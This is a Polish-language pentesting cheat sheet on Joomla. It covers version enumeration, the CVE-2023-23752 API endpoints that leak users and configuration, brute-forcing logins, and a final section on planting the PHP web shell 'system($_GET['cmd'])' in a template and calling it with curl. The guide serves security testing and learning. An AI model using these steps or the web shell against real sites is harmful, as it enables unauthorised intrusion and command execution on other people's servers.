Joomla
Statystyki Joomla
Joomla zbiera pewne anonimowe statystyki użytkowania, takie jak podział wersji Joomla, PHP i baz danych oraz systemy operacyjne serwerów używane w instalacjach Joomla. Te dane można zapytać za pomocą ich publicznego API.
Wyliczenie
Odkrywanie/Śledzenie
Sprawdź meta
robots.txt
README.txt
Wersja
W /administrator/manifests/files/joomla.xml można zobaczyć wersję.
W /language/en-GB/en-GB.xml można uzyskać wersję Joomla.
W plugins/system/cache/cache.xml można zobaczyć przybliżoną wersję.
API Uwrażliwienie na Ujawnienie Informacji bez Uwierzytelnienia:
Wersje od 4.0.0 do 4.2.7 są podatne na Ujawnienie informacji bez uwierzytelnienia (CVE-2023-23752), które ujawnią dane uwierzytelniające i inne informacje.
Użytkownicy:
http://<host>/api/v1/users?public=true
Plik konfiguracyjny:
http://<host>/api/index.php/v1/config/application?public=true
Moduł MSF: scanner/http/joomla_api_improper_access_checks
lub skrypt ruby: 51334
Atak Brute-Force
Możesz użyć tego skryptu, aby spróbować przeprowadzić atak brute force na logowanie.
RCE
Jeśli udało ci się uzyskać dane logowania administratora, możesz wykonać RCE wewnątrz niego, dodając kawałek kodu PHP w celu uzyskania RCE. Możemy to zrobić, dostosowując szablon.
Kliknij na
Szablony
w dolnym lewym rogu podKonfiguracją
, aby otworzyć menu szablonów.Kliknij na nazwę szablonu. Wybierzmy
protostar
pod nagłówkiemSzablon
. Spowoduje to otwarcie stronySzablony: Dostosuj
.Wreszcie, możesz kliknąć na stronę, aby wyświetlić źródło strony. Wybierzmy stronę
error.php
. Dodamy jednoliniowy kod PHP do uzyskania wykonania kodu w następujący sposób:system($_GET['cmd']);
Zapisz i zamknij
curl -s http://joomla-site.local/templates/protostar/error.php?cmd=id
Last updated